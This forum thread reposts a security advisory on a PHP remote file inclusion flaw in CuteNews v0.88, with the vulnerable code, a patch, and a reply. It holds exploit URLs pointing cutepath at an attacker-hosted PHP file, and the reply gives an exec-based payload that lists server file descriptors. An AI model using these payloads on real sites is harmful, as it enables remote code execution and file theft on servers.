Likes Likes:  0
Resultaten 1 tot 2 van de 2
Geen
  1. #1
    Over_G
    PHP code injection in CuteNews
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    PHP code injection in CuteNews

    PHP source code injection in CuteNews



    Informations :
    ===============================================
    Script : CuteNews v0.88
    Offical site : http://air.langame.net/
    ===============================================

    PHP Scripts :
    ===============================================

    shownews.php :

    if(!$cutepath) $cutepath=".";
    require_once("$cutepath/config.php");
    {.........}
    $all_news=file("$cutepath/news.txt");

    ===============================================

    search.php :

    require_once("$cutepath/config.php");

    ===============================================

    comments.php :

    if(!$cutepath){$cutepath=".";}
    require_once("$cutepath/config.php");

    ===============================================


    Exploits :

    http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
    http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
    http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/

    with :
    http://[ATTACKER]/config.php
    http://[ATTACKER]/news.txt

    Content config.php or news.txt:
    Any PHP Code.

    ===============================================

    Patch :
    Replace

    if(!$cutepath){$cutepath=".";}
    require_once("$cutepath/config.php");

    on $cutepath=".";

    ===============================================



    Best Regards, Over_G [DWC Gr0up] and VenoM
    Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
    Mail: OverG@mail.ru VenoM88@mail.ru

  2. #2
    Steve Grubb
    PHP code injection in CuteNews
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: PHP code injection in CuteNews

    In-Reply-To: <E18ndJT-000JS2-00@f19.mail.ru>

    Hello,

    If the cutenews website is running apache 2.x which
    leaks descriptors to all kinds of things
    http://marc.theaimsgroup.com/?l=vuln...5997219471&w=2

    Then you can do this:

    config.php =

    <html><head><title>File List</title></head>
    <body> <?php
    $cmd = "/bin/ls -l /proc/$$/fd";
    exec($cmd, $dir_listing, $status);
    foreach($dir_listing as $item) {
    $match = preg_split("/> /", $item);
    if ($match[1]) {
    if (preg_match("/\//", $match[1])) {
    echo $match[1]; echo "<br>";
    }
    }
    }
    ?> </body></html>

    it doesn't take alot more to make this a fully
    clickable file transfer utility that Sandboxes or Jails
    cannot protect.

    -Steve Grubb

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics